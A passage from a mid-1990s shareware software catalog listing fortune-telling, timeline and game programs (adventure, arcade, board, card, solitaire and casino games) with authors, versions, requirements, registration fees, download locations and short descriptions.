full description on page 542. + + Product: Fortune Teller [***] + Seven ways to tell fortunes, plus ESP test. See full + description on page 595. + + Product: Geomancy [***] + Ancient system of divination with black magic. See full + description on page 659. + + Product: NUMERO UNO + Numerology program. See full description on page 596. + + Chapter 16, "Religion & philosophy" 661 + + + + Product: Personal Tarot [***] + Fortune telling with Tarot cards. See full description on + page 597. + + Product: Wynter Stone's I Ching [***] + I CHING fortunes and philosophy. See full description on + page 598. + + Product: Your ESP Test [***] + Find out if you have psychic powers! See full description on + page 598. + + + 16.5 Software tools & add-ins + + 16.5.1 For other + + Product: ACCU Music System + Create music that can be played, printed, etc. See full + description on page 626. + + Product: CHRONOS + Interactive historical timelines. See full description on + page 536. + + + 16.6 Other + + Product: Bible Timeline for Windows + Author: Cascoly Software, 206-523-6135 + Version: 1.01 (09-28-94) + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; WITBTL.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 76703,3046 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + When were the gospels written? Who ruled Babylon and Egypt + during Biblical times? This lets you sort and selects + individual people and events, or groups and factions, to + develop new insights and trace patterns across different eras + and cultures. You can modify or expand any of the datasets. + + Chapter 17, "Games" 662 + + + + + + Chapter 17 + Games + + See also: Home & hobby, Lottery; Education, Computers, + Educational computer games. + + + 17.1 Adventure + + Product: Dave Dude + Author: APG + Version: 2.1 (05-14-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse; XMS memory; VBRUN200.DLL. 640x480x16 video + mode required. + Strongly recommended: sound card. + Registration fee: $18.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; bonus game levels; all ASP- + wide offers (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; DD95.ZIP on CompuServe in + CIS:GAMERS forum LIBrary 2 (or contact userID 100552,1570 for + assistance). + SWREG#: 5654 + PsL#: 11997 + Download size: 777k (about 58 minutes with a 2400 baud modem) + Description: + The first real adventure game for Microsoft Windows. The + newcomer APG released a completely animated game. Nearly the + whole screen is used for graphics. You're controlling Dave Dude + with the mouse; you don't have to enter any text. Just click + around and select actions and objects with your mouse. More + than 15 different screens garantee fun and entertainment for + hours. A must for fans of the LucasArts-Adventures... + + + Product: MAZE3 + 3D maze/cave creation and exploration game. See full + description on page 690. + + Chapter 17, "Games" 663 + + + + Product: T-Zero + Author: Dennis M. Cunningham, 503-227-7751 + Version: 1.04 (11-30-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; all ASP-wide offers + (see page 6). 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: T-ZERO.ZIP on BBSs (call 414-789-4210 to download it at + no charge); T-ZERO.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 2 (or contact userID 71107,3037 for assistance); T- + ZERO.ZIP on GEnie in IBMPC forum LIBrary 7. + Download size: 232k (about 17 minutes with a 2400 baud modem) + Description: + This game, mixing elements of fantasy and science fiction while + exploring the nature of time, is dedicated to all gamers + saddened by the premature death knell sounded for text + adventures. Scenes take place in a rustic but disturbing + present; a bustling prehistoric era; and a damaged bureaucratic + future. Features: input buffer, player-definable function + keys, DOS shell, restart/save/restore/undo, directional or + cursor keyboard control, hard copy of game's prose, hint file. + Expert level. + + + Product: Volcano Hunter + Author: Informative Technologies, 202-675-4528 + Version: 1.0 (06-15-91) + Needs: IBM AT (80286), DOS 3.1 or better. 16MHz or faster + computer. VGA monitor. + Registration fee: $10.00 + Registration benefits: A printed map of the screens in Volcano + Hunter; Several evaluation versions of other software from + Informative Technologies; A certificate for $7 off a + subscription to Shareware Magazine; A certificate for a free + CompuServe membership. + Look for: VOLCANO.ZIP on BBSs (call 301-596-1180 to download it + at no charge); VOLCAN.ZIP on CompuServe in CIS:PCFUN forum + LIBrary 3 (or contact userID 74777,3004 for assistance). + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Monsters, treacherous ledges, hot lava, water-filled caverns, + conveyor belts, moving platforms, beamers, secret doors, + hotplates, timer bombs and more contribute to the action. Over + 200 screens of cities, mountains and caverns. Blow up, burn up, + drown, fall to your death or be killed by the Druts. But, you + could survive and escape with gold beyond your imagination and + save the city. + + Chapter 17, "Games" 664 + + + + 17.2 Arcade games + + Product: Jewel Thief + Author: ServantWare + Version: 1.3 (04-27-93) + Needs: IBM AT (80286), Windows 3.0 or better. 640k RAM; EGA + monitor; Hard disk; Mouse. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: JWLTHF.ZIP on BBSs (call 313-663-4173 to download it at + no charge); JWLTHF.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 3 (or contact userID 76636,1166 for assistance). + Download size: 52k (about four minutes with a 2400 baud modem) + Description: + An exciting Windows game where you travel to faraway places and + collect jewels while avoiding restless natives. Great reviews + in PC Magazine, Windows Sources, Windows Gizmos, and Windows + After Hours. Excellent use of graphics and animation. Features + include high scores, three speed options, accelerator and pause + options. + + + Product: Math Rescue #1 + Author: Redwood Games, 707-937-3320 + Version: 1.0 (02-10-93) + Needs: IBM PC, DOS 3.0 or better. Hard Disk, EGA monitor. + Registration fee: $19.00 + Registration benefits: Hint sheet, support. Shareware disks of + other programs. + Look for: #1MATH.ZIP on BBSs (call 508 to download it at no + charge); MATH.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 0 + (or contact userID 71501,3553 for assistance); #1MATH.ZIP on + GEnie in IBMPC forum LIBrary 0 (or contact userID K.CROWTHER1 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Awards & nominations: 1993 winner, Shareware Industry Awards. + Description: + All the fun of an arcade game and it teaches Math too! Math + Rescue features both number problems and silly word problems. + Play as a boy or girl. Rescue the numbers from the Gruzzles. + Slime the Gruzzles who try to steal the math answers! Explore + the ocean, ice caves, volcanoes and more! Dual scrolling + screens and sound card support make this state-of-the-art game + so fun that kids don't even realize that they are learning + their math facts. Supports AdLib/SoundBlaster, Keyboard/ + Joystick. + + Chapter 17, "Games" 665 + + + + Product: O.R.B.Y. + Author: Able Art Software, 604-229-4766 + Version: 1.0 (12-21-93) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; EGA monitor; Hercules monitor. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support. + Look for: ORBY10.ZIP on BBSs (multiple files); ORBY10.ZIP on + CompuServe in CIS:GAMERS forum LIBrary 7 (or contact userID + 71431,1673 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + Orbit Rebound Bankshot Yaw...a game that combines elements of + hockey, billiards, and planetary orbits. Use strategy to score + goals with orbiting planets. Play against another person, or + see if you can beat the computer. Keyboard input, high scores + hall of fame, sound toggle on/off. + + + Product: Shooting Gallery + Author: Arcanum Computing + Version: 3.3 (02-07-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; VGA monitor; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus sound effects library. + Look for: SHOOTG33.ZIP on BBSs (call 508-788-6951 to download it + at no charge); SHOOTG.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 7 (or contact userID 71020,2613 for assistance). + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + An action/arcade game which uses 256 color MCGA graphics mode. + Seven rounds of play are included, with different targets and + objectives on each round. Rounds include arcade shooting range, + skeet, quick draw and wild west shootout. Supports SoundBlaster + for digitzed sound effects. Includes practice mode, high score + hall of fame, extensive statistics, etc. + + Chapter 17, "Games" 666 + + + + Product: SuperFly + Author: Arcanum Computing + Version: 2.1 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; bonus game hints. + Look for: SFLY21.ZIP on BBSs (call 508-788-6951 to download it at + no charge); SFLY.ZIP on CompuServe in CIS:GAMERS forum LIBrary + 7 (or contact userID 71020,2613 for assistance). + Download size: 79k (about six minutes with a 2400 baud modem) + Description: + An action game by Nels Anderson, author of Mah Jongg, EGATrek, + etc. Uses hi-res graphics mode and requires an EGA or VGA card + to play. Chase the flies and other insect invaders through 20 + different rounds. Includes 3 levels of difficulty, shell to + DOS, high score hall of fame, etc. Use mouse, joystick or + keyboard to play. + + + Product: Volcano Hunter + Save the city from the Volcano Druts. See full description on + page 663. + + Product: Word Rescue #1 + Author: Redwood Games, 707-937-3320 + Version: 1.0 (02-10-93) + Needs: IBM PC, DOS 3.0 or better. Hard disk, EGA monitor. + Registration fee: $19.00 + Registration benefits: Hint sheet, support. Disks of other + shareware. + Look for: #1RESCUE.ZIP on BBSs; RESCUE.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 0 (or contact userID 71501,3553 for + assistance); #1RESCUE.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID K.CROWTHER1 for assistance). + Download size: 340k (about 25 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + All the fun of an arcade game on your PC. And it teaches + reading and word recognition too! Play as a little girl or + boy. Help Benny Bookworm reunite words with their meanings! + Slime the Gruzzles who are stealing words out of books! Explore + towns, castles, waterfalls, and more! Dual scrolling screens + make this state-of-the-art game so fun that kids don't even + realize that they are learning to read! Has a handy pop-up + word/picture help for pre-readers. Adlib/Soundblaster, + Joystick/keyboard. + + Chapter 17, "Games" 667 + + + + Product: WOWSpill + Author: World Of Windows Software + Version: 1.0 (09-09-93) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: 3 months of unlimited CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: WOWSPILL.ZIP on BBSs; WOWSPL.EXE on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 73163,2110 for + assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Windows arcade game where you race against the clock and water + flow to connect random pieces of pipe from the water faucet to + the drain. If the water reaches the end of the pipe before you + connect it to the drain, a spill occurs. Extra points for + creating crosses and using bonus pieces. Three board sizes for + different strategies, each with a high score board. + + + Product: XFIRE: Action Puzzle game + Action Puzzle game. See full description on page 689. + + + 17.3 Board games + + 17.3.1 Backgammon + + Product: DOC DEFIANT + An original board game similar to Backgammon. See full + description on page 683. + + Chapter 17, "Games" 668 + + + + 17.3.2 Mahjong + + Product: Dragons Bane: Mah Jongg II + Author: Arcanum Computing + Version: 1.0 (06-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Strongly recommended: SVGA monitor. + Registration fee: $16.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6). additional tile + sets, board layouts, background pictures. + Look for: DRGNBN10.ZIP on BBSs (call 508-788-6951 to download it + at no charge); DRGNBN.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 950k (about 71 minutes with a 2400 baud modem) + Description: + Addictive tile solitaire! Dragons Bane: Mah Jongg II is a + second generation version of the popular tile solitaire game. + It supports both SVGA and VGA graphics and SoundBlaster sound + effects. A wide variety of tiles are available and an editor is + included to make your own. The original "dragon" layout is just + one of many arrangements possible and with the built-in layout + editor there is no limit to the possibilities. Extensive + record keeping is possible for those who like statistics. + + + Product: Mah Jongg-Solitaire + Author: Arcanum Computing + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor; + Hercules monitor. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited BBS, CompuServe, mail support; bonus + utilities. Bonus tile sets & board layouts. + Look for: MAHJNG42.ZIP on BBSs (call 508-788-6951 to download it + at no charge); MAHJNG.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + A highly addictive solitaire game played with colorful Chinese + tiles. The challenge is to remove all the tiles from the + playing surface. It sounds easy to play (and it is), but + winning is always a challenge. The game supports EGA, VGA and + Hercules graphics, mouse or keyboard input. Supports loadable + tile sets (one extra set included) as well as an editor with + which players can create their own tiles. Also supports + different board layouts. + + Chapter 17, "Games" 669 + + + + 17.3.3 Other + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 693. + + Product: Backup + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.4 (05-21-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; discounts on other products. Lifetime free upgrading + allowed. + Look for: BACKUP14.ZIP on BBSs (call 312-922-2839 to download it + at no charge); BACKU*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 3 (or contact userID 71532,3271 for assistance). + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + A Windows board game where four opponents compete to become the + first to move all four pieces around the board, Along the way + pieces may be "bumped" or switched. On-line help. + + + Product: BATTLE CHARGE + A two-player strategy game. See full description on page 694. + + Product: Cell War + "Life" style simulation game. See full description on + page 695. + + Product: COLOR CROSS + An abstract two-player strategy game. See full description on + page 695. + + Chapter 17, "Games" 670 + + + + Product: Econ's Arena + Author: Glen DeBiasa + Version: 1.04 (05-18-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: XMS memory; sound card. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + Look for: availability unknown on BBSs; ECONAR.EXE on CompuServe + in CIS:GAMERS forum LIBrary 13 (or contact userID 70602,3257 + for assistance). + SWREG#: 5913 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + The elements have declared war on one another and only the + being called Econ can prevent them from destroying their world. + Play as Earth, Air, Fire, or Water on the changing terrain of + Econ's Arena. Control Ogres, Griffons, Dragons, Tritons, and + other mythological pieces. Cast spells imprisoning your foes or + protecting your troops. Play against three friends or the + computer's eight personalities. Collect your elemental tokens + and attack Econ himself... if you dare! + + + Product: FLUX + Author: MOONLITE Software + Version: 1.0 (03-31-93) + Needs: IBM PC, DOS 3.0 or better. VGA monitor, mouse. + Registration fee: $15.00 + Registration benefits: BBS support, discounts on other products. + Look for: FLUX.ZIP on BBSs (call 310-429-3807 to download it at + no charge); FLUX.ZIP on CompuServe in CIS:IBMGAM forum LIBrary + 6 (or contact userID 71203,1454 for assistance). + Download size: 74k (about six minutes with a 2400 baud modem) + Description: + Exciting board game where you pit your skills against the + computer. Features many different board layouts which offer + new challenges each game. You must move your pieces to + dominate the playing field, while the computer is doing the + same. Features 3 playing levels, pop-up selection menus, + playing piece color selection and hours upon hours of + entertainment. + + + Product: Oil Baron + Board-type company stock trading game. See full description on + page 697. + + Chapter 17, "Games" 671 + + + + 17.4 Card games + + Product: BlackJack! + Author: Glencoe Computing, 314-458-2863 + Version: 2.50d (08-21-94) + Needs: IBM PC, DOS 2.0 or better. 350k RAM; EGA monitor; + Hercules monitor. + Registration fee: $37.50 (add $3.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + CompuServe, mail support. 6-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: BJ250.ZIP on BBSs; BJ250.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 8 (or contact userID 72416,1362 for + assistance). + Download size: 176k (about 13 minutes with a 2400 baud modem) + Description: + An accurate simulation of the game Blackjack as played in + American and foreign casinos. Splitting, double-down, insurance + and surrender are all supported. Completely adaptable to any + system of play. User defined count based and progressive + wagering systems. Thorough documentation, sophisticated + practice drills, and error tracking help the user reach any + level of expertise. In the words of hundreds of satisfied + users: "The best I've ever seen." Super high quality graphics. + + + Product: CONTRACT BRIDGE + Author: Wells Computing Services, 813-447-0604 + Version: 2.0 (07-10-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse; + Epson printer; math coprocessor. + Registration fee: $15.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + mail support; 1-month limited return policy. + Look for: BRIDGE20.ZIP on BBSs. + Download size: 99k (about eight minutes with a 2400 baud modem) + Description: + Bids, plays and scores rubber matches of the card game + "Contract Bridge". The user bids and plays the SOUTH hand, and + if NORTH-SOUTH are declarers, the user plays both hands. A + number of customizing features are available, including the + ability to enter hands using the keyboard or mouse. The program + is best suited for recreational players who enjoy informal + games of Rubber Bridge, and can be used to learn the game or + sharpen skills. Comes with on-line instructions. + + Chapter 17, "Games" 672 + + + + Product: Hearts + Author: CareWare, 916-265-8704 + Version: 6.6 (08-06-93) + Needs: IBM PC, DOS 2.0 or better. 364k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $15.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: 51/4" master disk(s); lifetime unlimited + phone, CompuServe, mail support. 1-month return policy. + Look for: HRT66.ZIP on BBSs; HRT66.EXE on CompuServe in + CIS:IBMNEW forum LIBrary 8 (or contact userID 74270,516 for + assistance); HEARTS65.ZIP on GEnie in IBMPC forum LIBrary 7 (or + contact userID R.CROUCH1 for assistance). + Download size: 82k (about six minutes with a 2400 baud modem) + Description: + Featured in COMPUTE! magazine and is acclaimed by many users to + be the best Hearts game they have experienced. You try your + luck against three computer players with control over several + users options. PIF and ICO files for start-up from Windows + 3.x. Offers full mouse support, ease of play and fun for the + whole family. + + + Product: Pinocle Games + Author: Michael G. Bruckner, 614-761-2966 + Version: 1.2 (01-01-93) + Needs: IBM PC, DOS 3.2 or better. + Strongly recommended: EGA monitor. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of mail support; 3-month return policy; bonus utilities; + all ASP-wide offers (see page 6). + Look for: PINOCL12.ZIP on BBSs (call 715-652-2758 to download it + at no charge); PNCL12.EXE on CompuServe in CIS:IBMNEW forum + LIBrary 8. + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + 3 variations of 4-handed, single-deck, partnership Pinocle: + BASIC - play with the cards dealt to you, kitty - high bidder + gets a 4-card kitty (widow), and pass - the high bidder swaps 4 + cards with his partner. You play your hand; the computer plays + the other 3. The program allows the user to control many color + and game variables. Good graphics on most popular systems. + This game will challenge experienced players yet help beginners + because it can recommend the card to play. + + Chapter 17, "Games" 673 + + + + Product: ULTIMATE GIN + Author: Accidental Software, 619-247-2804 + Version: 1.42 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 540k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + bonus utilities; all ASP-wide offers (see page 6); discounts on + other products. + Look for: ULTGIN.ZIP on BBSs. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Play Gin rummy against one of 4 computer characters. Each has + his or her own style of play and abilities. You can play + standard Gin or 1 of 2 versions of "Okalhoma" gin. You can + even select "Holywood" scoring of disired. Change the points + required for game completion, all bonus scores are adjustable. + Play any player up to 40 games per match, or start a new match + with any player at any time. A unique card holder allows you + to see your hand in melds at a glance. Excellent graphics. + + + 17.4.1 Solitaire + + Product: Calculation Solitaire + Author: Daniel Thomas, 714-524-5625 + Version: 1.12 (12-23-91) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk; Mouse. + Strongly recommended: VGA monitor; Modem. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware. + Look for: availability unknown on BBSs; CLCSOL.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 2 (or contact userID 72301,2164 for + assistance). + Download size: 72k (about six minutes with a 2400 baud modem) + Description: + A solitaire card game for Windows 3.x. All the features you've + come to expect from Windows card games, including: card + dragging, skill levels, top scores, unlimited undo, on-screen + hints, changing card backs, and more. Skill plays an important + part in this game. + + Chapter 17, "Games" 674 + + + + Product: Canfield for Windows + Author: Daniel Thomas, 714-524-5625 + Version: 1.01 (01-04-92) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware. + Look for: availability unknown on BBSs; CANFLD.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 2 (or contact userID 72301,2164 for + assistance). + Download size: 104k (about eight minutes with a 2400 baud modem) + Description: + A solitaire card game for Windows 3.x. Lots of bells and + whistles (plus some surprises), such as: cheating, card + dragging, skill levels, top scores, unlimited undo, on-screen + hints, animated card backs, and more. + + + Product: PATIENCE 10 + Author: CoCoWare - Cowles Company Software, 817-367-3603 + Version: 4.01 (05-21-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of mail support; 1-month return policy; bonus utilities. + 1 free update disk(s) sent out. + Look for: PATENC41.ZIP on BBSs; PATN41.ZIP on CompuServe in + DNT:KNOW forum LIBrary 0; PATENC41.ZIP on GEnie in DONT KNOW + forum LIBrary 0. + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + Features a collection of 10 popular and addictive solitaire + card games all run from a single menu. The games include: + Accordion, Canfield, Dimaryp, Eliminate, Golf, Klondike, + Nestor, Pyramid, Stacker, and Vegas. Each game features its + own resetable best scores table. Documentation covers rules + and strategies for all ten games. Screen-sensitive Help and an + Undo feature are also included. A mouse is fully supported and + custom color setup is available to registrants. + + Chapter 17, "Games" 675 + + + + Product: Patience Abroad + Author: CoCoWare - Cowles Company Software, 817-367-3603 + Version: 1.01 (05-21-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of mail support; 1-month return policy; bonus utilities. + Look for: ABROAD11.ZIP on BBSs (call N-A to download it at no + charge); ABRD11.ZIP on CompuServe in DNT:KNOW forum LIBrary 0; + ABROAD11.ZIP on GEnie in DONT KNOW forum LIBrary 0. + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Features a collection of 9 of the best solitaire card games and + puzzles around. The games are: Beleaguered Castle, Tower of + Hanoy, Monte Carlo, Weddings, the Great Wall, Russian Patience, + Sir Tommy, Four Kingdoms, and Florentine. Each game features + its own resetable best scores table. Documentation covers rules + and examples for all games. Screen-sensitive Help and an Undo + function are also included. A mouse is fully supported and + custom color and mouse setup are available to registrants. + + + 17.5 Non-card games + + Product: BTS-Equalizer + Tutor and study aid, question file exchange. See full + description on page 515. + + 17.5.1 Solitaire + + Product: AntiC + AntiChaos puzzles. See full description on page 682. + + Product: ATC: Air Traffic Controller + Air traffic controller simulation. See full description on + page 693. + + Chapter 17, "Games" 676 + + + + Product: Equatron + Author: Glen DeBiasa + Version: 2.10 (07-08-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $5.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support. + Look for: availability unknown on BBSs; EQUTRN.EXE on CompuServe + in CIS:GAMERS forum LIBrary 13 (or contact userID 70602,3257 + for assistance). + Download size: 245k (about 18 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A challenging strategy game played against the computer. The + computer randomly generates a mathematical equation, which it + fills in with numbers from the game board. Your task is to beat + the computer, scoring more or less than the computer, depending + on the round. There are special tiles to help you in your task. + As the rounds progress, the stakes grow higher, and the + equations become complicated, adding more variables, operators, + parenthesis, and even exponents. Over 30 different equations. + + + Product: PEG + Peg solitaire and variations. See full description on + page 686. + + Product: Second Guess + Author: Arcanum Computing + Version: 1.1 (07-10-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; Hard + disk; Mouse. + Strongly recommended: SVGA monitor. SoundBlaster or + compatible. + Registration fee: $16.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). Additional + tile sets & background pictures. + Look for: GUESS11.ZIP on BBSs (call 508-788-6951 to download it + at no charge); GUESS.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 860k (about 64 minutes with a 2400 baud modem) + Description: + Solitaire and more! Concentration solitaire game with every + imaginable playing option, including three board sizes, wild + cards, various scoring options and more. Also multi player + games and play versus the computer. SuperVGA graphics and + digitized sound effects for SoundBlaster. Photo backgrounds and + + Chapter 17, "Games" 677 + + + + sharp, detailed tiles for playing pieces with tile editor + included. + + + Product: Tile Match + Author: Arcanum Computing + Version: 1.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus tile sets & backgrounds. + Look for: TMATCH12.ZIP on BBSs (call 508-788-6951 to download it + at no charge); TMATCH.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + A colorful variation of concentration solitaire (also known as + memory) played with tiles. Includes many play options for a + single player, or can be played by 2 to 4 players or by a + single player against the computer. Multiple difficulty levels + and scoring options. Uses the same tile sets as Mah Jongg + solitaire and includes the TileMaker tile editing utility for + users to create their own tiles. + + + Product: WEBS + Strategy game of fast changing networks. See full description + on page 699. + + + 17.6 Casino games + + See also: Home & hobby, Gambling. + + Chapter 17, "Games" 678 + + + + Product: RoboCrap.v94 + Author: Second Career Software + Version: 1.00 (01-02-95) + Needs: IBM PC, DOS 2.0 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. ANSI.SYS or equivalent. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime mail support; 1-month limited + return policy; bonus utilities. + Look for: RBCRAP10.ZIP on BBSs. + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + A fully-implemented, Las Vegas-style crap table simulation with + all the action and excitement of Craps, one of the fastest + moving and most exciting games in the casino. For up to 3 + players, beginners or experienced. + + + Product: $mart Gambler + For people who play to win! See full description on page 